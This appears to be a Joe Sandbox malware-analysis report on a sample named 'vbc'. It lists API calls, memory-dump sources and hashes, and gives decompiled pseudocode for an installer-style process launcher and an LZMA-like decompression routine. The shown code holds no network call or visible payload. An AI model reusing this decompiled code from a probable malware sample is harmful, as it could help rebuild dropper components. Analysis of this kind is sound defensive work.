                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405365
                                                  • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                • Instruction ID: 55ce392e6746b2cc60fd0279fd4fa9b35be9dafe7b92107a95c9794c7a372d77
                                                • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                • Instruction Fuzzy Hash: 8F01B1B2200708ABEF209F11DD80AAB3725EB80395F545036FE007A1D1C3BA8D929E6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004058F2(WCHAR* _a4) {
                                                				struct _PROCESS_INFORMATION _v20;
                                                				int _t7;
                                                
                                                				0x426730->cb = 0x44;
                                                				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426730,  &_v20); // executed
                                                				if(_t7 != 0) {
                                                					CloseHandle(_v20.hThread);
                                                					return _v20.hProcess;
                                                				}
                                                				return _t7;
                                                			}





                                                0x004058fb
                                                0x0040591b
                                                0x00405923
                                                0x00405928
                                                0x00000000
                                                0x0040592e
                                                0x00405932

                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                • CloseHandle.KERNEL32(?), ref: 00405928
                                                Strings
                                                • Error launching installer, xrefs: 00405905
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                • Instruction ID: ac9b0bf38c37d054f1ed4f6a01e64bdbc49d0edc431f290d839f62d49592851a
                                                • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                • Instruction Fuzzy Hash: B0E04FF0A00209BFEB009B64ED45F7B77ACEB04208F404431BD00F2160D77498148A78
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 99%
                                                			E00406D0F() {
                                                				signed int _t530;
                                                				void _t537;
                                                				signed int _t538;
                                                				signed int _t539;
                                                				unsigned short _t569;
                                                				signed int _t579;
                                                				signed int _t607;
                                                				void* _t627;
                                                				signed int _t628;
                                                				signed int _t635;
                                                				signed int* _t643;
                                                				void* _t644;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t530 =  *(_t644 - 0x30);
                                                					if(_t530 >= 4) {
                                                					}
                                                					 *(_t644 - 0x40) = 6;
                                                					 *(_t644 - 0x7c) = 0x19;
                                                					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                					while(1) {
                                                						L145:
                                                						 *(_t644 - 0x50) = 1;
                                                						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                						while(1) {
                                                							L149:
                                                							if( *(_t644 - 0x48) <= 0) {
                                                								goto L155;
                                                							}
                                                							L150:
                                                							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                							 *(_t644 - 0x54) = _t643;
                                                							_t569 =  *_t643;
                                                							_t635 = _t569 & 0x0000ffff;
                                                							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                							if( *(_t644 - 0xc) >= _t607) {
                                                								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                								_t628 = _t627 + 1;
                                                								 *_t643 = _t569 - (_t569 >> 5);
                                                								 *(_t644 - 0x50) = _t628;
                                                							} else {
                                                								 *(_t644 - 0x10) = _t607;
                                                								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                							}
                                                							if( *(_t644 - 0x10) >= 0x1000000) {
                                                								L148:
                                                								_t487 = _t644 - 0x48;
                                                								 *_t487 =  *(_t644 - 0x48) - 1;
                                                								L149:
                                                								if( *(_t644 - 0x48) <= 0) {
                                                									goto L155;
                                                								}
                                                								goto L150;
                                                							} else {
                                                								L154:
                                                								L146:
                                                								if( *(_t644 - 0x6c) == 0) {
                                                									L169:
                                                									 *(_t644 - 0x88) = 0x18;
                                                									L170:
                                                									_t579 = 0x22;
                                                									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                									_t539 = 0;
                                                									L172:
                                                									return _t539;
                                                								}
                                                								L147:
                                                								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                								_t484 = _t644 - 0x70;
                                                								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                								goto L148;
                                                							}
                                                							L155:
                                                							_t537 =  *(_t644 - 0x7c);
                                                							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                							while(1) {
                                                								L140:
                                                								 *(_t644 - 0x88) = _t537;
                                                								while(1) {
                                                									L1:
                                                									_t538 =  *(_t644 - 0x88);
                                                									if(_t538 > 0x1c) {
                                                										break;
                                                									}
                                                									L2:
                                                									switch( *((intOrPtr*)(_t538 * 4 +  &M0040717D))) {
                                                										case 0:
                                                											L3:
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												goto L170;
                                                											}
                                                											L4:
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                											_t538 =  *( *(_t644 - 0x70));
                                                											if(_t538 > 0xe1) {
                                                												goto L171;
                                                											}
                                                											L5:
                                                											_t542 = _t538 & 0x000000ff;
                                                											_push(0x2d);
                                                											asm("cdq");
                                                											_pop(_t581);
                                                											_push(9);
                                                											_pop(_t582);
                                                											_t638 = _t542 / _t581;
                                                											_t544 = _t542 % _t581 & 0x000000ff;
                                                											asm("cdq");
                                                											_t633 = _t544 % _t582 & 0x000000ff;
                                                											 *(_t644 - 0x3c) = _t633;
                                                											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                												L10:
                                                												if(_t641 == 0) {
                                                													L12:
                                                													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                													goto L15;
                                                												} else {
                                                													goto L11;
                                                												}
                                                												do {
                                                													L11:
                                                													_t641 = _t641 - 1;
                                                													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                												} while (_t641 != 0);
                                                												goto L12;
                                                											}
                                                											L6:
                                                											if( *(_t644 - 4) != 0) {
                                                												GlobalFree( *(_t644 - 4));
                                                											}
                                                											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                											 *(_t644 - 4) = _t538;
                                                											if(_t538 == 0) {
                                                												goto L171;
                                                											} else {
                                                												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                												goto L10;
                                                											}
                                                										case 1:
                                                											L13:
                                                											__eflags =  *(_t644 - 0x6c);
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												L157:
                                                												 *(_t644 - 0x88) = 1;
                                                												goto L170;
                                                											}
                                                											L14:
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                											_t45 = _t644 - 0x48;
                                                											 *_t45 =  *(_t644 - 0x48) + 1;
                                                											__eflags =  *_t45;
                                                											L15:
                                                											if( *(_t644 - 0x48) < 4) {
                                                												goto L13;
                                                											}
                                                											L16:
                                                											_t550 =  *(_t644 - 0x40);
                                                											if(_t550 ==  *(_t644 - 0x74)) {
                                                												L20:
                                                												 *(_t644 - 0x48) = 5;
                                                												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                												goto L23;
                                                											}
                                                											L17:
                                                											 *(_t644 - 0x74) = _t550;
                                                											if( *(_t644 - 8) != 0) {
                                                												GlobalFree( *(_t644 - 8));
                                                											}
                                                											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                											 *(_t644 - 8) = _t538;
                                                											if(_t538 == 0) {
                                                												goto L171;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										case 2:
                                                											L24:
                                                											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                											 *(_t644 - 0x84) = 6;
                                                											 *(_t644 - 0x4c) = _t557;
                                                											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                											goto L132;
                                                										case 3:
                                                											L21:
                                                											__eflags =  *(_t644 - 0x6c);
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												L158:
                                                												 *(_t644 - 0x88) = 3;
                                                												goto L170;
                                                											}
                                                											L22:
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											_t67 = _t644 - 0x70;
                                                											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                											__eflags =  *_t67;
                                                											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                											L23:
                                                											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                											if( *(_t644 - 0x48) != 0) {
                                                												goto L21;
                                                											}
                                                											goto L24;
                                                										case 4:
                                                											L133:
                                                											_t559 =  *_t642;
                                                											_t626 = _t559 & 0x0000ffff;
                                                											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                											if( *(_t644 - 0xc) >= _t596) {
                                                												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                												 *(_t644 - 0x40) = 1;
                                                												_t560 = _t559 - (_t559 >> 5);
                                                												__eflags = _t560;
                                                												 *_t642 = _t560;
                                                											} else {
                                                												 *(_t644 - 0x10) = _t596;
                                                												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                											}
                                                											if( *(_t644 - 0x10) >= 0x1000000) {
                                                												goto L139;
                                                											} else {
                                                												goto L137;
                                                											}
                                                										case 5:
                                                											L137:
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												L168:
                                                												 *(_t644 - 0x88) = 5;
                                                												goto L170;
                                                											}
                                                											L138:
                                                											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                											L139:
                                                											_t537 =  *(_t644 - 0x84);
                                                											L140:
                                                											 *(_t644 - 0x88) = _t537;
                                                											goto L1;
                                                										case 6:
                                                											L25:
                                                											__edx = 0;
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												L36:
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) = 1;
                                                												 *(__ebp - 0x84) = 7;
                                                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											L26:
                                                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                											__esi =  *(__ebp - 0x60);
                                                											__cl = 8;
                                                											__cl = 8 -  *(__ebp - 0x3c);
                                                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                											__ecx =  *(__ebp - 0x3c);
                                                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                											__ecx =  *(__ebp - 4);
                                                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                											__eflags =  *(__ebp - 0x38) - 4;
                                                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											if( *(__ebp - 0x38) >= 4) {
                                                												__eflags =  *(__ebp - 0x38) - 0xa;
                                                												if( *(__ebp - 0x38) >= 0xa) {
                                                													_t98 = __ebp - 0x38;
                                                													 *_t98 =  *(__ebp - 0x38) - 6;
                                                													__eflags =  *_t98;
                                                												} else {
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                												}
                                                											} else {
                                                												 *(__ebp - 0x38) = 0;
                                                											}
                                                											__eflags =  *(__ebp - 0x34) - __edx;
                                                											if( *(__ebp - 0x34) == __edx) {
                                                												L35:
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												goto L61;
                                                											} else {
                                                												L32:
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__ecx =  *(__ebp - 8);
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												__al =  *((intOrPtr*)(__eax + __ecx));
                                                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                												goto L41;
                                                											}
                                                										case 7:
                                                											L66:
                                                											__eflags =  *(__ebp - 0x40) - 1;
                                                											if( *(__ebp - 0x40) != 1) {
                                                												L68:
                                                												__eax =  *(__ebp - 0x24);
                                                												 *(__ebp - 0x80) = 0x16;
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												__eax =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xa;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                												__eax =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 4) + 0x664;
                                                												__eflags = __eax;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L69;
                                                											}
                                                											L67:
                                                											__eax =  *(__ebp - 4);
                                                											__ecx =  *(__ebp - 0x38);
                                                											 *(__ebp - 0x84) = 8;
                                                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                											goto L132;
                                                										case 8:
                                                											L70:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xa;
                                                												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                											} else {
                                                												__eax =  *(__ebp - 0x38);
                                                												__ecx =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 0x38) + 0xf;
                                                												 *(__ebp - 0x84) = 9;
                                                												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                											}
                                                											goto L132;
                                                										case 9:
                                                											L73:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												goto L90;
                                                											}
                                                											L74:
                                                											__eflags =  *(__ebp - 0x60);
                                                											if( *(__ebp - 0x60) == 0) {
                                                												goto L171;
                                                											}
                                                											L75:
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                											__eflags = _t259;
                                                											0 | _t259 = _t259 + _t259 + 9;
                                                											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                											goto L76;
                                                										case 0xa:
                                                											L82:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												L84:
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xb;
                                                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											L83:
                                                											__eax =  *(__ebp - 0x28);
                                                											goto L89;
                                                										case 0xb:
                                                											L85:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__ecx =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x20);
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                											} else {
                                                												__eax =  *(__ebp - 0x24);
                                                											}
                                                											__ecx =  *(__ebp - 0x28);
                                                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                											L89:
                                                											__ecx =  *(__ebp - 0x2c);
                                                											 *(__ebp - 0x2c) = __eax;
                                                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                											L90:
                                                											__eax =  *(__ebp - 4);
                                                											 *(__ebp - 0x80) = 0x15;
                                                											__eax =  *(__ebp - 4) + 0xa68;
                                                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                											goto L69;
                                                										case 0xc:
                                                											L99:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L164:
                                                												 *(__ebp - 0x88) = 0xc;
                                                												goto L170;
                                                											}
                                                											L100:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t334 = __ebp - 0x70;
                                                											 *_t334 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t334;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											__eax =  *(__ebp - 0x2c);
                                                											goto L101;
                                                										case 0xd:
                                                											L37:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L159:
                                                												 *(__ebp - 0x88) = 0xd;
                                                												goto L170;
                                                											}
                                                											L38:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t122 = __ebp - 0x70;
                                                											 *_t122 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t122;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L39:
                                                											__eax =  *(__ebp - 0x40);
                                                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                												goto L48;
                                                											}
                                                											L40:
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												goto L54;
                                                											}
                                                											L41:
                                                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                											 *(__ebp - 0x48) = __eax;
                                                											__eax = __eax + 1;
                                                											__eax = __eax << 8;
                                                											__eax = __eax + __ebx;
                                                											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edx = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												 *(__ebp - 0x40) = 1;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												__ebx = __ebx + __ebx + 1;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edx;
                                                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L39;
                                                											} else {
                                                												L45:
                                                												goto L37;
                                                											}
                                                										case 0xe:
                                                											L46:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L160:
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											L47:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t156 = __ebp - 0x70;
                                                											 *_t156 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t156;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											while(1) {
                                                												L48:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													break;
                                                												}
                                                												L49:
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t170 = __edx + 1; // 0x1
                                                													__ebx = _t170;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													continue;
                                                												} else {
                                                													L53:
                                                													goto L46;
                                                												}
                                                											}
                                                											L54:
                                                											_t173 = __ebp - 0x34;
                                                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                											__eflags =  *_t173;
                                                											goto L55;
                                                										case 0xf:
                                                											L58:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L161:
                                                												 *(__ebp - 0x88) = 0xf;
                                                												goto L170;
                                                											}
                                                											L59:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t203 = __ebp - 0x70;
                                                											 *_t203 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t203;
